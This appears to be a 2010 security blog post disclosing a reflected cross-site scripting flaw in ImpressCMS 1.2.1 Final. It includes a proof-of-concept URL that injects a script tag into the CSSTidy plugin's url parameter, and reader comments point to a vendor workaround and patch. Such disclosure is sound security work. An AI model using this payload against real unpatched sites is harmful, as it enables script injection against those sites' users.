This site is soon to be deprecated by http://www.johnleitch.net

Sunday, July 11, 2010

ImpressCMS 1.2.1 Final Reflected Cross-site Scripting

A reflected cross-site scripting vulnerability in ImpressCMS 1.2.1 Final can be exploited to execute arbitrary JavaScript.

PoC
http://localhost/impresscms/plugins/csstidy/css_optimiser.php?url=%22%3E%3Cscript%3Ealert(0)%3C/script%3E
Posted by John Leitch at 7:57 AM
Labels: , , ,

4 comments:

  1. AnonymousJuly 12, 2010 at 1:26 PM

    please be aware, this is not an issue with impresscms, it is an issue with csstidy which is used by many projects.

    ReplyDelete
  2. UnknownJuly 13, 2010 at 10:42 AM

    A workaround has been published by the ImpressCMS project: http://community.impresscms.org/modules/smartsection/item.php?itemid=494

    A security release will be upcoming.

    ReplyDelete
  3. Steve KJuly 17, 2010 at 4:38 PM

    An updated release removing the vulnerability in CSSTidy has been published by ImpressCMS - http://community.impresscms.org/modules/smartsection/item.php?itemid=495

    ReplyDelete
  4. android tabletJuly 15, 2011 at 6:04 PM

    Good post. Thanks for sharing.

    ReplyDelete

Subscribe to: Post Comments (Atom)